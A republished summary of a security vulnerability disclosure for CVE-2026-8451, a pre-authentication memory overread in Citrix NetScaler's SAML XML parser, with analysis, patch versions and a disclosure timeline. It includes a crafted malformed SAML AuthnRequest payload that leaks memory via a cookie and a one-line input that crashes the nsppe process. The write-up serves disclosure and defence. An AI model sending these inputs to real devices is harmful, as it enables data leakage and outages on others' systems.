CitrixBleed Infinity: Pre‑Auth Memory Overread in NetScaler (CVE‑2026‑8451)

The watchTowr team uncovered a high‑severity (CVSS 8.8) pre‑authentication memory overread vulnerability (CVE‑2026‑8451) in Citrix NetScaler’s SAML IDP parsing, detailing the XML attribute flaw, exploitation steps, leaked data, a simple DoS path, detection tooling, and remediation guidance.

Black & White Path
Black & White Path
Black & White Path
CitrixBleed Infinity: Pre‑Auth Memory Overread in NetScaler (CVE‑2026‑8451)

Vulnerability Overview

Security researchers from watchTowr disclosed a new pre‑authentication memory overread vulnerability in Citrix NetScaler, assigned CVE‑2026‑8451 with a CVSS score of 8.8. The flaw belongs to the CitrixBleed family and affects SAML IDP configurations where XML attribute parsing lacks proper validation, allowing unauthenticated attackers to read sensitive memory.

CVE ID: CVE‑2026‑8451

Name: Citrix Bleed To Infinity And Beyond

Type: Pre‑Auth Memory Overread

CVSS: 8.8 (High)

Root Cause: Insufficient input validation in SAML AuthnRequest XML attribute parsing

Trigger: NetScaler configured as a SAML IDP

Technical Analysis

XML Attribute Parser Defect

During review of the CVE‑2026‑3055 patch, the team found the following problematic logic in the SAML AuthnRequest parser:

cursor = <input string>;
// skip leading whitespace
for (lookahead = ...; ; lookahead++) {
    ch = *cursor;
    if (ch > '=') break;
    if (!_bittest64(&whitespaceCharList, ch)) {
        if (ch == '=') {
            // found '=', skip following whitespace
            while (1) {
                ch = *lookahead;
                if (ch > 0x20 || !_bittest64(&whitespaceCharList, ch)) break;
                ++lookahead;
            }
            cursor = lookahead;
        }
        break;
    }
    ++cursor;
}
// Determine how the attribute value is quoted
if (ch == '\'' || ch == '"') {
    terminator = ch;
    first = *++cursor;
} else {
    terminator = ' ';
    first = ch;
}
// Scan until terminator
while (first != '\0' && first != '>') {
    scanPos++;
    first = *scanPos;
    if (first == terminator) break;
}

The code lacks explicit boundary checks, treats quoted and unquoted values differently, and mishandles the '>' character as a terminator only in the attribute‑name phase, leading to uncontrolled reads.

From Faulty Parsing to Overread

Normal parsing of a SAML AuthnRequest succeeds, but when the team replaced spaces after attribute values with newline characters, the parser continued reading past the request buffer until it encountered a '>' character.

AuthnReq start tag parsed, id=<_99d3e71118f42305e05acb14ad0bd917>, acs=<http://sp.example.com/demo1/index.php?acs>, forceAuth=<0>, binding=<POST>, following data "ProtocolBinding=..."

After injecting newlines, the log shows:

AuthnReq start tag parsed, id=<22>, acs=<11 id=22>, forceAuth=<0>, binding=<Unknown>, following data Version="2.0" AssertionConsumerServiceURL=11 id=22> <saml:Issuer>watchtowr...

The parser failed to stop at the newline and read beyond the buffer.

Further Overread

By crafting a payload with a newline after the AssertionConsumerServiceURL attribute, the parser read memory beyond the request buffer, mixing arbitrary bytes into the parsed output.

<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=>
<saml2:issuer>watchtowr</saml2:issuer>
</samlp:AuthnRequest>
Version="2.0"
id="11"
AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11"
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>,
forceAuth=<0>, binding=<Unknown>

The parser had read past the request buffer and injected those bytes into the result.

Exploitation

Attack Path

Exploiting the bug requires sending a specially crafted SAML AuthnRequest that forces the XML parser to scan beyond the request buffer. NetScaler returns the parsed ID and AssertionConsumerServiceURL values in the NSC_TASS cookie, leaking the over‑read memory to the client.

Leaked bytes include patterns such as 0xdeadbeef and a plausible process pointer 0xa10ca7ed, indicating the vulnerability can serve as an information‑leak primitive that, when combined with a memory‑corruption bug, could lead to full device compromise.

Leaked bytes:
00000000 f0 0d 90 de de de de de de de de de de de de de |................|
00000010 de de de de de de de de de de de de de de de de |................|
00000020 de de de de de de de de de de de de de de de de |................|
00000030 de de de de de de de de de de de de de de de de |................|
00000040 de de de de de de de de de de de ed a7 |................|
00000050 0c a1 35 00 |..5.|

Simple Denial‑of‑Service

Sending a malformed request (e.g., an incomplete <samlp:AuthnRequest ID= tag) can crash the nsppe process, providing a quick way to demonstrate impact without building a full exploit chain.

<samlp:AuthnRequest ID=

Detection Tool

The researchers released an open‑source detection script:

GitHub: https://github.com/watchtowrlabs/watchTowr-vs-Netscaler-CVE-2026-8451

Remediation Recommendations

Immediate Update: Upgrade NetScaler ADC/Gateway to patched versions:

14.1 → 14.1‑72.61 or later

13.1 → 13.1‑63.18 or later

FIPS versions → apply the corresponding official patches

Temporary Mitigations: If updating is not possible, consider:

Disabling SAML IDP configuration when not required

Monitoring traffic to the /saml/login endpoint

Inspecting the NSC_TASS cookie for anomalous data

Timeline

2026‑03‑28: watchTowr discovers the vulnerability and notifies Citrix and affected customers.

2026‑03‑30: Citrix auto‑replies.

2026‑04‑30: watchTowr requests a fix.

2026‑05‑07: Citrix indicates a fix is in development.

2026‑06‑14: Citrix plans a public announcement for 2026‑06‑29.

2026‑06‑30: Citrix publishes the advisory and patches.

2026‑07‑07: watchTowr publicly releases detailed research.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

information securitySAMLCitrix NetScalerCVE-2026-8451pre-auth memory overreadXML parser
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.